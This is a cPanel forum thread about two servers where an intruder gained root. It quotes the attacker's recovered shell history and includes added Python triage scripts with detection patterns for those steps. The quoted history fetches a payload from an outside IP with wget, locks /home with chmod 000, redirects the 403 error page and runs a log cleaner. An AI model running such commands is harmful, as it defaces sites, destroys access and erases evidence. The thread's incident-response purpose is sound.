The Community Forums


Got 2 Cpanel Servers hacked... root gained, anyone know HOW they did?

Discussion in 'Security' started by cass, Jul 6, 2011.

  1. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    On two completely different cPanel servers, the same hacker or team gained access... (from Morocco)
    Anyone have an idea how this can be possible?
    The two servers were up to date (cPanel and OS); one of them had CSF/LFD (5.32) and was hardened in many ways, the other didn't have CSF, but was running suPHP.
    On both, SSH was running on non-standard ports.

    We have already seen more than one with the same issue....
    They basically... chmod 000 /home, and edit the 403 line of /usr/local/apache/conf/includes/errordocument.conf to show a hacked HTML page, which is then shown on all websites running on the server. Then they run a "log cleaner".

    First I thought it could be the CSF bug ... but one of the servers didn't have it, and the other already had it updated...
    We were looking around, and found the attacker IP (41.140.*) was apparently logged in to WHM (per Apache logs)...
    but we still can't determine HOW they got root access.... both servers were updated and running smoothly since the beginning... so we're afraid it could be a BUG that could affect other clients too.
    I'm not saying it's a cPanel bug... I'm trying to find someone who might actually KNOW what they did, as most logs/history were deleted on this server. Part of the history we found (as we logged in to the server quickly, before they left) was this:
    14 cd /tmp
    15 w
    16 wget 41.140.110.54/log
    17 pico /usr/local/apache/conf/includes/errordocument.conf
    18 service httpd restart
    19 ls -la /
    20 chmod 000 /home
    21 chmod 000 /home
    22 chmod 000 /home2
    23 chmod 000 /home2
    24 perl log
    25 perl log
    (this last command is the one that clears the logs, and then they were just gone)
    But we could see they got the file, what file they edited, etc.
    It looks like this is the only damage done, but if this is a bug, they can actually do anything they want, as they were working as ROOT!

    BTW similar problem found recently here:
    https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
     
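The post above describes a repeatable pattern (a payload fetched from a bare IP into /tmp, the 403 line of errordocument.conf redirected to a defacement page, /home and /home2 set to 000 so every site returns 403 and shows that page, then a Perl log cleaner). The following is an added triage example, not code from the thread or from cPanel: it flags those steps in a recovered shell history, reports whether the 403 ErrorDocument target differs from a baseline you supply, and lists home directories whose permission bits are 000. The history lines are the ones quoted in the post; the config text, the "/403.shtml" baseline, the "/hacked.html" target and the temporary directory tree are constructed for the demo, since the page does not show the real file contents.

```python
import os
import re
import shutil
import stat
import tempfile

# The root shell history quoted in the post above (duplicated fragments removed).
POSTED_HISTORY = [
    "cd /tmp",
    "w",
    "wget 41.140.110.54/log",
    "pico /usr/local/apache/conf/includes/errordocument.conf",
    "service httpd restart",
    "ls -la /",
    "chmod 000 /home",
    "chmod 000 /home2",
    "perl log",
]

# Patterns for the steps the post describes; the wording of the reasons is ours.
SUSPICIOUS_HISTORY = [
    (re.compile(r"^(wget|curl)\s+\d{1,3}(\.\d{1,3}){3}\b"), "payload fetched from a bare IP"),
    (re.compile(r"errordocument\.conf"), "Apache error page include edited"),
    (re.compile(r"^chmod\s+0+\s+/home\S*"), "home directory made inaccessible"),
    (re.compile(r"^perl\s+(\./)?log\b"), "log cleaner run"),
]


def flag_history(lines):
    """Return (command, reason) for every history line matching a known step."""
    hits = []
    for line in lines:
        for pattern, reason in SUSPICIOUS_HISTORY:
            if pattern.search(line):
                hits.append((line, reason))
    return hits


ERRORDOC_RE = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(\S+)", re.M)


def errordocument_targets(conf_text):
    """Map HTTP status code -> target for each ErrorDocument directive."""
    return {int(code): target for code, target in ERRORDOC_RE.findall(conf_text)}


def changed_403(conf_text, expected_target):
    """Return the current 403 target if it differs from the baseline, else None.

    The baseline (assumed here to be /403.shtml) must come from a clean server
    or a pre-incident backup; the post does not show the file's original content.
    """
    target = errordocument_targets(conf_text).get(403)
    return None if target == expected_target else target


def locked_home_dirs(paths):
    """Return the paths whose permission bits are exactly 000 (chmod 000)."""
    locked = []
    for path in paths:
        try:
            mode = stat.S_IMODE(os.stat(path).st_mode)
        except FileNotFoundError:
            continue
        if mode == 0:
            locked.append(path)
    return locked


# Constructed sample config: a clean file, and the same file with the 403 line
# pointed at a defacement page, as the post describes.
CLEAN_CONF = """\
ErrorDocument 401 /401.shtml
ErrorDocument 403 /403.shtml
ErrorDocument 404 /404.shtml
"""
TAMPERED_CONF = CLEAN_CONF.replace("/403.shtml", "/hacked.html")


def build_demo_tree():
    """Create a throwaway tree with one chmod-000 dir and one normal dir."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    locked, fine = os.path.join(root, "home"), os.path.join(root, "home2")
    os.mkdir(locked)
    os.mkdir(fine)
    os.chmod(locked, 0)
    os.chmod(fine, 0o711)
    return root, [locked, fine]


def cleanup_demo_tree(root):
    """Restore permissions so the demo tree can be deleted, then delete it."""
    for name in os.listdir(root):
        os.chmod(os.path.join(root, name), 0o755)
    shutil.rmtree(root)


if __name__ == "__main__":
    for cmd, reason in flag_history(POSTED_HISTORY):
        print(f"history: {cmd!r:60} {reason}")
    print("403 target changed to:", changed_403(TAMPERED_CONF, "/403.shtml"))
    root, paths = build_demo_tree()
    print("locked:", locked_home_dirs(paths))
    cleanup_demo_tree(root)
```

On a live server you would pass ["/home", "/home2"] to locked_home_dirs, feed the real /usr/local/apache/conf/includes/errordocument.conf and the baseline from a known-good copy to changed_403, and run flag_history over whatever of /root/.bash_history survived the cleaner. None of this tells you how root was obtained; it only confirms the post-compromise steps and gives you a timestamp (the mtime of errordocument.conf and of /home) to pivot from in the remaining logs.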
  2. k-planethost

    k-planethost Well-Known Member

    Joined:
    Sep 22, 2009
    Messages:
    199
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Athens Greece
    I suggest you hire a server admin for an hour or more to investigate your issue further.
    Answering from this forum how they gained root access is difficult without logs.
    Recompiled kernel, secured /tmp & /dev/shm, install mod_security with gotroot rules, firewall, disabled functions in PHP, recompile PHP with Suhosin; there are various security methods to implement on your boxes.
     
  3. BigLebowski

    BigLebowski Well-Known Member

    Joined:
    Dec 24, 2007
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    Were the kernels fully patched? There have been several root vulnerabilities over the years. I've seen lots of boxes plundered that way. Also, did you have brute force checking on? If you look at the logs you will normally see thousands of passwords tried over several days if CSF is not enabled and blocking.

    Dude
     
  4. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    Yes, brute force enabled (both CSF and cPanel), also mod_security.
    Kernel not patched (latest CentOS kernel installed).
     
  5. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,468
    Likes Received:
    196
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Assuming you have CSF set to stop and block failed logins after 5 attempts, and you have no record of failed attempts (or do you?), then we might want to consider that the user with the root password to that server might have some sort of issue locally. This sort of thing does happen where a user's computer is compromised somehow and passwords are pulled from plain text files where passwords may be stored for FTP clients. For example, FileZilla.

    There was a very long thread on this topic a while back on these forums that discussed this sort of thing.
     
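The check Infopro suggests is worth doing mechanically: if a root login succeeded with no run of failed attempts before it from the same address, a blocker set to fire after 5 failures would never have triggered, and the password was most likely obtained elsewhere (a compromised admin workstation, a saved FTP/SSH credential) rather than guessed. The following is an added example, not code from the thread or from CSF: it parses sshd "Failed"/"Accepted" lines in the CentOS /var/log/secure format and splits successful logins into those preceded by at least `threshold` failures (the blocker should have stopped these) and those that succeeded quietly. The log lines are constructed for the demo and use RFC 5737 documentation addresses, not the IPs from the thread; the threshold of 5 is taken from Infopro's assumption about the CSF setting.

```python
import re
from collections import Counter

# Constructed sample in /var/log/secure format (CentOS). Addresses are from the
# RFC 5737 documentation ranges, not the attacker IPs mentioned in the thread.
SAMPLE_LOG = """\
Jul  6 03:14:15 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 40111 ssh2
Jul  6 03:14:18 web1 sshd[2102]: Failed password for root from 203.0.113.7 port 40112 ssh2
Jul  6 03:14:21 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40113 ssh2
Jul  6 03:14:24 web1 sshd[2104]: Failed password for root from 203.0.113.7 port 40114 ssh2
Jul  6 03:14:27 web1 sshd[2105]: Failed password for root from 203.0.113.7 port 40115 ssh2
Jul  6 03:14:30 web1 sshd[2106]: Failed password for root from 203.0.113.7 port 40116 ssh2
Jul  6 03:14:33 web1 sshd[2107]: Accepted password for root from 203.0.113.7 port 40117 ssh2
Jul  6 04:02:10 web1 sshd[2310]: Accepted password for root from 198.51.100.9 port 51022 ssh2
Jul  6 04:02:11 web1 sshd[2310]: pam_unix(sshd:session): session opened for user root by (uid=0)
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ..." as well as Accepted lines.
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<outcome>Failed|Accepted) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ssh_events(text):
    """Return (ip, outcome, user, method) for each sshd auth result line, in log order."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if m:
            events.append((m["ip"], m["outcome"], m["user"], m["method"]))
    return events


def failed_by_ip(events):
    """Count failed attempts per source address."""
    return dict(Counter(ip for ip, outcome, _, _ in events if outcome == "Failed"))


def classify_logins(events, threshold=5):
    """Split successful logins by how many failures preceded them from the same IP.

    threshold mirrors a CSF/LFD-style block-after-N-failures setting (assumed 5).
    Returns (brute_forced, quiet): logins the blocker should have prevented, and
    logins that succeeded with fewer than `threshold` prior failures.
    """
    running = Counter()  # failures seen so far, per IP, in log order
    brute_forced, quiet = [], []
    for ip, outcome, user, _ in events:
        if outcome == "Failed":
            running[ip] += 1
        elif running[ip] >= threshold:
            brute_forced.append((ip, user))
        else:
            quiet.append((ip, user))
    return brute_forced, quiet


if __name__ == "__main__":
    events = parse_ssh_events(SAMPLE_LOG)
    print("failures per IP:", failed_by_ip(events))
    brute, quiet = classify_logins(events)
    print("logins after a brute-force run (blocker should have fired):", brute)
    print("logins with no brute-force run (credential likely obtained elsewhere):", quiet)
```

Run it over the real /var/log/secure (and its rotated copies), and cross-check against lfd's own log rather than trusting one file: the "log cleaner" the attacker ran may have removed exactly the failed-attempt lines this script is looking for, so an empty result is only meaningful if the log's integrity can be vouched for, for example from a remote syslog copy. A quiet root login from an address that also appears in the Apache/WHM access logs is the pattern the post describes, and it points at the workstation holding the root password rather than at the server.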